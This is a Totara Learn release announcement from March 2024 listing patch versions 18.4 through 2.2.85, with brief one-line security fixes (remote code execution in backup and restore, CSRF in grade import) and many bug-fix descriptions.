Hello everyone,
The following versions of Totara Learn have now been released:
- Release 18.4
- Release 17.17
- Release 16.23
- Release 15.29
- Release 14.34
- Release 13.42
- Release 12.61
- Release 11.61
- Release 10.63
- Release 9.69
- Release 2.9.66
- Release 2.7.71
- Release 2.5.90
- Release 2.2.85
These versions do contain security fixes, and for this reason we strongly recommend upgrade.
Each release also includes various bug fixes and improvements.
Kind regards Release Team
Release 18.4 (19th March 2024):
Important:
TL-39838 Fixed question bank text not being cleaned on output
In Totara 13 the consistent cleaning functionality was applied, which will clean
content on the site to prevent issues such as cross-site scripting. This
resulted in a change of behaviour in certain areas that are documented in our
developer
docs: https://totara.atlassian.net/wiki/spaces/DEV/pages/121185890/Totara+13+changes+to+content+sanitisation.
This change fixes a problem where question text was bypassing the content
filtering system, even if consistent cleaning was enabled.
If your quiz questions or question banks have custom HTML in them, the data may
be lost on the next save. Please check any quiz questions if they need to be
modified to work with consistent cleaning.
Security issues:
TL-39347 Fixed authenticated remote code execution vulnerability in block backup and restore
TL-39921 Fixed CSRF vulnerability in XML import for course grades
Performance improvements:
TL-39814 Reverted a previous improvement that caused performance degradation in visibility queries on large datasets
Bug fixes:
TL-36940 Fixed Engage playlist and resource navigation to remember more than one level of history
TL-37252 Included approval workflow assignment ID number in the fields which get updated when an organisation, position, or audience changes
The approval workflows framework observes change events for the organisations,
positions, and audiences to which assignments are related, and updates those
assignments to match. Previously, just the assignment name was changed. But the
assignment ID number is based on the organisation or position shortname, or the
audience ID number, so this patch ensures they are updated to match. Note that
it is not currently possible to manually change an assignment ID number.
The included upgrade step will sync assignment ID numbers so that they match the
current state of the related organisations, positions, and/or audiences.
TL-38483 Fixed a scenario where users being restored from suspension are no longer members of their tenant audience
Previously when a suspended user’s audiences were purged, it would also remove
them from the tenant audience. Then if the user was then unsuspended they may
not have been returned to their tenant again. The only way to fix it would be to
remove them from the tenant and add them back again on their profile page.
With this change there is a new ‘unsuspend_user’ event, and when it is
triggered the correct tenancies are applied. Previously when unsuspending a user
the suspended event was also triggered, this has been changed so either the
suspend or unsuspend events are triggered.
There is a new script provided that can be run to find and fix any users who are
not in their tenant audience: 'server/admin/cli/fix_orphan_tenant_members.php'.
TL-38582 Fixed notification log report error which was thrown when linked preference was deleted or didn't exist
TL-38748 Fixed a warning showing in the scheduled tasks output when using Redis
TL-39056 Fixed accounts created via 'Self-registration with approval' sometimes being auto-confirmed by third-party email systems
When an account is created with the ‘Self-registration with approval’
plugin, an email is sent to the account with a link the user must click to
confirm the account. In some cases the email system would scan links in emails
and preload them, in this instance confirming the account. When the user would
then click the link, Totara would show an error as the account had already been
confirmed.
With this fix the link sent in the email will open a page where the user must
press a button to confirm their account.
TL-39160 Fixed user interest tags not obeying multitenancy visibility rules
TL-39163 Fixed guest autologin not working on dashboards
TL-39182 Centralised notifications can now be disabled by a user in their notification preferences
Centralised notifications will now correctly adhere to the 'emailstop' setting.
This setting can now be set on the notification preference page for a user.
This also prevents notifications from being sent unexpectedly when adding users
via HR import with ‘emailstop’ set.
TL-39197 Fixed tenant-related notifications not appearing in notification logs for administrators
This was achieved by bypassing user content restrictions for site
administrators. As a result, site administrators can now view data relating to
users from all tenants in reports.[evergreen-20240319]This was achieved by
changing the user content restrictions to allow system users (those not
belonging to a tenant) to view data relating to users from all tenants in
reports. This brings user content restrictions for system users in line with
documentation and other functionality.[evergreen-20240319]
TL-39230 Fixed the seminar fatal error on updating settings when using 'Require event over for' setting
TL-39271 Changed seminar reservation cancelled notification to send to affected managers only
Before this change, if a manager’s reservations were cancelled, a notification
was sent to all managers who have reservations. Now it is only sent to the
affected manager. Third-party recipients will now receive one notification for
each affected manager.
TL-39398 Fixed that Pathway format course triggers three course_viewed events
Removed trigger of course_viewed event from get_course_completion_for_header and
get_course_navigation queries for the Pathway course format since they were
creating additional course_viewed events but they didn’t allow users to view
course contents.
TL-39426 Moved seminar virtual room URL from location to description in iCal
When a seminar room contains a virtual room link, the link was being included in
the LOCATION property of the iCal email attachments. This caused problems in
some calendars, where clicking the location would attempt to find a place on a
map using the URL as text. Now the virtual room URLs are added to the iCal
DESCRIPTION and can be clicked to open the virtual meeting.
TL-39429 Fixed a problem when the 'User reports to any of these users' dynamic audience rule would show an error
In a scenario where the ‘User reports to any of these users’ dynamic
audience rule was applied and there were no users with a matching job
assignment, an error could have appeared in the scheduled tasks job.
TL-39511 Fixed locale not being applied correctly in approval workflows date fields
TL-39530 Allowed admins to change activity completion method for activities requiring a passing grade
TL-39548 Improved keyboard navigation to block sidebars
TL-39574 Fixed wrong progress sorting order for the Totara Goals status report
TL-39576 Fixed HTMLPurifier stripping ARIA attributes from content during cleaning
TL-39612 Fixed current filters being forgotten when multiple report table blocks are added to the same page
TL-39614 Moved results information to a heading above the report results tables
Previously the number of found rows in different kinds of reports were
inconsistently displayed. With this change the number of records loaded now
shows in a heading above the report table.
All existing pages embedding reports have been updated. Any custom code
embedding reports need to be manually updated to reflect this.
TL-39670 Fixed an error when adding an external LTI tool with PHP 8.0 or higher
Previously, adding an external LTI tool with Totara running on PHP 8.0 or higher
could result in an error under certain conditions, related to the
lti_is_cartridge() check. This patch fixes the problem.
TL-39699 Fixed placeholder failure in Course Due Date course notification during audience assignment
TL-39786 Fixed user profile blocks relying on expected autoincrement IDs
TL-39808 Added lang string replacement to the application form preview in approval workflows
Previously approval forms would show the lang string keys when previewing. This
has now been updated to replace the lang string keys with their corresponding
values.
TL-39843 Fixed links to tel and sms protocols being removed by HTMLPurifier during cleaning
TL-39852 Fixed sections in topic format not having the correct role for screen readers
TL-39859 Fixed dates not translating correctly on Windows servers
TL-39904 Fixed Workspace Owner and Workspace creator roles having no context level set
TL-39914 Addressed an issue where view-only participants couldn't preview Totara goals within a performance activity
Tui front end framework:
TL-37951 Updated WorkspaceDiscussionTab.vue to ignore errors in fetchMore queries if the component has been unmounted
This is a workaround for an error that occurs when a fetchMore apollo query
returns after the component has been unmounted. This only happens with the
fetchMore method so is likely an issue with vue apollo.
TL-39926 Fixed Tui checkboxes having double labels when used in Uniform
Release 17.17 (19th March 2024):
Important:
TL-39838 Fixed question bank text not being cleaned on output
In Totara 13 the consistent cleaning functionality was applied, which will clean
content on the site to prevent issues such as cross-site scripting. This
resulted in a change of behaviour in certain areas that are documented [in our
developer docs: https://totara.atlassian.net/wiki/spaces/DEV/pages/121185890/Totara+13+changes+to+content+sanitisation.
This change fixes a problem where question text was bypassing the content
filtering system, even if consistent cleaning was enabled.
If your quiz questions or question banks have custom HTML in them, the data may
be lost on the next save. Please check any quiz questions if they need to be
modified to work with consistent cleaning.
Security issues:
TL-39347 Fixed authenticated remote code execution vulnerability in block backup and restore
TL-39921 Fixed CSRF vulnerability in XML import for course grades
Performance improvements:
TL-39814 Reverted a previous improvement that caused performance degradation in visibility queries on large datasets
Improvements:
TL-37335 Remove toast from atto editor auto save on draft.
Bug fixes:
TL-36940 Fixed Engage playlist and resource navigation to remember more than one level of history
TL-37252 Included approval workflow assignment ID number in the fields which get updated when an organisation, position, or audience changes
The approval workflows framework observes change events for the organisations,
positions, and audiences to which assignments are related, and updates those
assignments to match. Previously, just the assignment name was changed. But the
assignment ID number is based on the organisation or position shortname, or the
audience ID number, so this patch ensures they are updated to match. Note that
it is not currently possible to manually change an assignment ID number.
The included upgrade step will sync assignment ID numbers so that they match the
current state of the related organisations, positions, and/or audiences.
TL-38483 Fixed a scenario where users being restored from suspension are no longer members of their tenant audience
Previously when a suspended user’s audiences were purged, it would also remove
them from the tenant audience. Then if the user was then unsuspended they may
not have been returned to their tenant again. The only way to fix it would be to
remove them from the tenant and add them back again on their profile page.
With this change there is a new ‘unsuspend_user’ event, and when it is
triggered the correct tenancies are applied. Previously when unsuspending a user
the suspended event was also triggered, this has been changed so either the
suspend or unsuspend events are triggered.
There is a new script provided that can be run to find and fix any users who are
not in their tenant audience: 'server/admin/cli/fix_orphan_tenant_members.php'.
TL-38582 Fixed notification log report error which was thrown when linked preference was deleted or didn't exist
TL-38748 Fixed a warning showing in the scheduled tasks output when using Redis
TL-39056 Fixed accounts created via 'Self-registration with approval' sometimes being auto-confirmed by third-party email systems
When an account is created with the ‘Self-registration with approval’
plugin, an email is sent to the account with a link the user must click to
confirm the account. In some cases the email system would scan links in emails
and preload them, in this instance confirming the account. When the user would
then click the link, Totara would show an error as the account had already been
confirmed.
With this fix the link sent in the email will open a page where the user must
press a button to confirm their account.
TL-39160 Fixed user interest tags not obeying multitenancy visibility rules
TL-39163 Fixed guest autologin not working on dashboards
TL-39182 Centralised notifications can now be disabled by a user in their notification preferences
Centralised notifications will now correctly adhere to the 'emailstop' setting.
This setting can now be set on the notification preference page for a user.
This also prevents notifications from being sent unexpectedly when adding users
via HR import with ‘emailstop’ set.
TL-39197 Fixed tenant-related notifications not appearing in notification logs for administrators
This was achieved by bypassing user content restrictions for site
administrators. As a result, site administrators can now view data relating to
users from all tenants in reports.[evergreen-20240319]This was achieved by
changing the user content restrictions to allow system users (those not
belonging to a tenant) to view data relating to users from all tenants in
reports. This brings user content restrictions for system users in line with
documentation and other functionality.[evergreen-20240319]
TL-39271 Changed seminar reservation cancelled notification to send to affected managers only
Before this change, if a manager’s reservations were cancelled, a notification
was sent to all managers who have reservations. Now it is only sent to the
affected manager. Third-party recipients will now receive one notification for
each affected manager.
TL-39426 Moved seminar virtual room URL from location to description in iCal
When a seminar room contains a virtual room link, the link was being included in
the LOCATION property of the iCal email attachments. This caused problems in
some calendars, where clicking the location would attempt to find a place on a
map using the URL as text. Now the virtual room URLs are added to the iCal
DESCRIPTION and can be clicked to open the virtual meeting.
TL-39429 Fixed a problem when the 'User reports to any of these users' dynamic audience rule would show an error
In a scenario where the ‘User reports to any of these users’ dynamic
audience rule was applied and there were no users with a matching job
assignment, an error could have appeared in the scheduled tasks job.
TL-39548 Improved keyboard navigation to block sidebars
TL-39576 Fixed HTMLPurifier stripping ARIA attributes from content during cleaning
TL-39595 Fixed accessibility issue with single activity course headings
TL-39612 Fixed current filters being forgotten when multiple report table blocks are added to the same page
TL-39614 Moved results information to a heading above the report results tables
Previously the number of found rows in different kinds of reports were
inconsistently displayed. With this change the number of records loaded now
shows in a heading above the report table.
All existing pages embedding reports have been updated. Any custom code
embedding reports need to be manually updated to reflect this.
TL-39670 Fixed an error when adding an external LTI tool with PHP 8.0 or higher
Previously, adding an external LTI tool with Totara running on PHP 8.0 or higher
could result in an error under certain conditions, related to the
lti_is_cartridge() check. This patch fixes the problem.
TL-39699 Fixed placeholder failure in Course Due Date course notification during audience assignment
TL-39786 Fixed user profile blocks relying on expected autoincrement IDs
TL-39843 Fixed links to tel and sms protocols being removed by HTMLPurifier during cleaning
TL-39852 Fixed sections in topic format not having the correct role for screen readers
TL-39859 Fixed dates not translating correctly on Windows servers
TL-39904 Fixed Workspace Owner and Workspace creator roles having no context level set
Tui front end framework:
TL-37951 Updated WorkspaceDiscussionTab.vue to ignore errors in fetchMore queries if the component has been unmounted
This is a workaround for an error that occurs when a fetchMore apollo query
returns after the component has been unmounted. This only happens with the
fetchMore method so is likely an issue with vue apollo.
TL-39926 Fixed Tui checkboxes having double labels when used in Uniform
Release 16.23 (19th March 2024):
Security issues:
TL-39347 Fixed authenticated remote code execution vulnerability in block backup and restore
TL-39921 Fixed CSRF vulnerability in XML import for course grades
Bug fixes:
TL-38483 Fixed a scenario where users being restored from suspension are no longer members of their tenant audience
Previously when a suspended user’s audiences were purged, it would also remove
them from the tenant audience. Then if the user was then unsuspended they may
not have been returned to their tenant again. The only way to fix it would be to
remove them from the tenant and add them back again on their profile page.
With this change there is a new ‘unsuspend_user’ event, and when it is
triggered the correct tenancies are applied. Previously when unsuspending a user
the suspended event was also triggered, this has been changed so either the
suspend or unsuspend events are triggered.
There is a new script provided that can be run to find and fix any users who are
not in their tenant audience: 'server/admin/cli/fix_orphan_tenant_members.php'.
TL-38748 Fixed a warning showing in the scheduled tasks output when using Redis
TL-39429 Fixed a problem when the 'User reports to any of these users' dynamic audience rule would show an error
In a scenario where the ‘User reports to any of these users’ dynamic
audience rule was applied and there were no users with a matching job
assignment, an error could have appeared in the scheduled tasks job.
TL-39612 Fixed current filters being forgotten when multiple report table blocks are added to the same page
TL-39786 Fixed user profile blocks relying on expected autoincrement IDs
Release 15.29 (19th March 2024):
Important:
TL-39838 Fixed question bank text not being cleaned on output
In Totara 13 the consistent cleaning functionality was applied, which will clean
content on the site to prevent issues such as cross-site scripting. This
resulted in a change of behaviour in certain areas that are documented [in our
developer docs: https://totara.atlassian.net/wiki/spaces/DEV/pages/121185890/Totara+13+changes+to+content+sanitisation.
This change fixes a problem where question text was bypassing the content
filtering system, even if consistent cleaning was enabled.
If your quiz questions or question banks have custom HTML in them, the data may
be lost on the next save. Please check any quiz questions if they need to be
modified to work with consistent cleaning.
Security issues:
TL-39347 Fixed authenticated remote code execution vulnerability in block backup and restore
TL-39921 Fixed CSRF vulnerability in XML import for course grades
Bug fixes:
TL-39429 Fixed a problem when the 'User reports to any of these users' dynamic audience rule would show an error
In a scenario where the ‘User reports to any of these users’ dynamic
audience rule was applied and there were no users with a matching job
assignment, an error could have appeared in the scheduled tasks job.
TL-39612 Fixed current filters being forgotten when multiple report table blocks are added to the same page
Release 14.34 (19th March 2024):
Important:
TL-39838 Fixed question bank text not being cleaned on output
In Totara 13 the consistent cleaning functionality was applied, which will clean
content on the site to prevent issues such as cross-site scripting. This
resulted in a change of behaviour in certain areas that are documented in our
developer docs.
This change fixes a problem where question text was bypassing the content
filtering system, even if consistent cleaning was enabled.
If your quiz questions or question banks have custom HTML in them, the data may
be lost on the next save. Please check any quiz questions if they need to be
modified to work with consistent cleaning.
Security issues:
TL-39347 Fixed authenticated remote code execution vulnerability in block backup and restore
TL-39921 Fixed CSRF vulnerability in XML import for course grades
Bug fixes:
TL-39429 Fixed a problem when the 'User reports to any of these users' dynamic audience rule would show an error
In a scenario where the ‘User reports to any of these users’ dynamic
audience rule was applied and there were no users with a matching job
assignment, an error could have appeared in the scheduled tasks job.
TL-39612 Fixed current filters being forgotten when multiple report table blocks are added to the same page
Release 13.42 (19th March 2024):
Important:
TL-39838 Fixed question bank text not being cleaned on output
In Totara 13 the consistent cleaning functionality was applied, which will clean
content on the site to prevent issues such as cross-site scripting. This
resulted in a change of behaviour in certain areas that are documented [in our
developer docs: https://totara.atlassian.net/wiki/spaces/DEV/pages/121185890/Totara+13+changes+to+content+sanitisation].
This change fixes a problem where question text was bypassing the content
filtering system, even if consistent cleaning was enabled.
If your quiz questions or question banks have custom HTML in them, the data may
be lost on the next save. Please check any quiz questions if they need to be
modified to work with consistent cleaning.
Security issues:
TL-39347 Fixed authenticated remote code execution vulnerability in block backup and restore
TL-39921 Fixed CSRF vulnerability in XML import for course grades
Bug fixes:
TL-39612 Fixed current filters being forgotten when multiple report table blocks are added to the same page
Release 12.61 (19th March 2024):
Security issues:
TL-39347 Fixed authenticated remote code execution vulnerability in block backup and restore
TL-39921 Fixed CSRF vulnerability in XML import for course grades
Release 11.61 (19th March 2024):
Security issues:
TL-36056 Added additional check to local URLs params
TL-39347 Fixed authenticated remote code execution vulnerability in block backup and restore
TL-39921 Fixed CSRF vulnerability in XML import for course grades
Release 10.63 (19th March 2024):
Security issues:
TL-36056 Added additional check to local URLs params
TL-39347 Fixed authenticated remote code execution vulnerability in block backup and restore
TL-39921 Fixed CSRF vulnerability in XML import for course grades
Release 9.69 (19th March 2024):
Security issues:
TL-36056 Added additional check to local URLs params
TL-39347 Fixed authenticated remote code execution vulnerability in block backup and restore
TL-39921 Fixed CSRF vulnerability in XML import for course grades
Release 2.9.66 (19th March 2024):
Security issues:
TL-36056 Added additional check to local URLs params
TL-39347 Fixed authenticated remote code execution vulnerability in block backup and restore
TL-39921 Fixed CSRF vulnerability in XML import for course grades
Release 2.7.71 (19th March 2024):
Security issues:
TL-36056 Added additional check to local URLs params
TL-39347 Fixed authenticated remote code execution vulnerability in block backup and restore
TL-39921 Fixed CSRF vulnerability in XML import for course grades
Release 2.5.90 (19th March 2024):
Security issues:
TL-36056 Added additional check to local URLs params
TL-39347 Fixed authenticated remote code execution vulnerability in block backup and restore
TL-39921 Fixed CSRF vulnerability in XML import for course grades
Release 2.2.85 (19th March 2024):
Security issues:
TL-36056 Added additional check to local URLs params
TL-39347 Fixed authenticated remote code execution vulnerability in block backup and restore
TL-39921 Fixed CSRF vulnerability in XML import for course grades